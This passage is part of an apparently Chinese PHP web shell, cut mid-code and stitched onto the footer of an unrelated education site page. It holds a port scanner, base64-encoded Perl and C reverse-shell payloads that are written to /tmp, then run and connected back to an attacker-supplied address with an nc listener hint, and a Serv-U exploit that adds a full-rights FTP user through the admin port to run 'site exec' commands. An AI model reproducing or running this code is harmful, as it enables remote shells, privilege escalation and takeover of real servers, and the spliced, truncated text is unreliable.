';}@$result->MoveNext();}}

$shell->Close();

@$shell->Release();

$shell = NULL;

echo '
';

}

}

return true;

}

//扫描端口

function Port_i()

{

$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';

$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958';

print<<


扫描IP


端口号






END;

if((!empty($_POST['ip'])) && (!empty($_POST['port'])))

{

echo '
';

$ports = explode('|', $_POST['port']);

for($i = 0;$i < count($ports);$i++)

{

$fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,2);

echo $fp ? '开放端口 ---> '.$ports[$i].'

' : '关闭端口 ---> '.$ports[$i].'

';

ob_flush();

flush();

}

echo '
';

}

return true;

}

//Linux提权

function Linux_k()

{

$yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR');

$yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666';

print<<


你的地址


连接端口


执行方式




END;

if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))

{

echo '
';

if($_POST['use'] == 'perl')

{

$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/spider_bc成功

' : '创建/tmp/spider_bc失败

';

$perlpath = Exec_Run('which perl');

$perlpath = $perlpath ? chop($perlpath) : 'perl';

echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

}

if($_POST['use'] == 'c')

{

$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".

"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".

"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".

"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".

"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".

"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".

"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".

"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/spider_bc.c成功

' : '创建/tmp/spider_bc.c失败

';

$res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c');

@unlink('/tmp/spider_bc.c');

echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

}

echo '

你可以尝试连接端口 (nc -l -n -v -p '.$_POST['yourport'].')
';

}

return true;

}

//ServU提权

function Servu_l()

{

$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';

print<<




ServU端口


ServU用户


ServU密码


END;

if($_GET['o'] == 'adduser')

{

print<<
帐号

密码

目录


END;

}

else

{

print<<
提权命令







END;

}

echo '
';

if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))

{

echo '
';

$sendbuf = "";

$recvbuf = "";

$domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";

$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".

"-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".

"-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";

$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";

$sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "USER ".$_POST["SUUser"]."\r\n";

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "SITE MAINTENANCE\r\n";

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = $domain;

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = $adduser;

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

if(!empty($_POST['SUCommand']))

{

$exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10);

$recvbuf = @fgets($exp, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "USER ".$_POST['user']."\r\n";

@fputs($exp, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($exp, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "PASS ".$_POST['password']."\r\n";

@fputs($exp, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($exp, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";

@fputs($exp, $sendbuf, strlen($sendbuf));

echo "发送数据包: site exec ".$_POST["SUCommand"]."

";

$recvbuf = @fgets($exp, 1024);

echo "返回数据包: $recvbuf

";

$sendbuf = $deldomain;

@fputs($sock, $sendbuf, strlen($sendbuf));

echo "发送数据包: $sendbuf

";

$recvbuf = @fgets($sock, 1024);

echo "返回数据包: $recvbuf

";

@fclose($exp);

}

@fclose($sock);

echo '
';

}

}

//MYSQL提权

functio
相关链接:

·语文课件下载
·语文视频下载
·语文试题下载

·语文备课中心




点此察看与本文相关的其它文章』『搜索相关课件


上一篇】【下一篇  【教师投稿】 
本站管理员:尹瑞文 微信:13958889955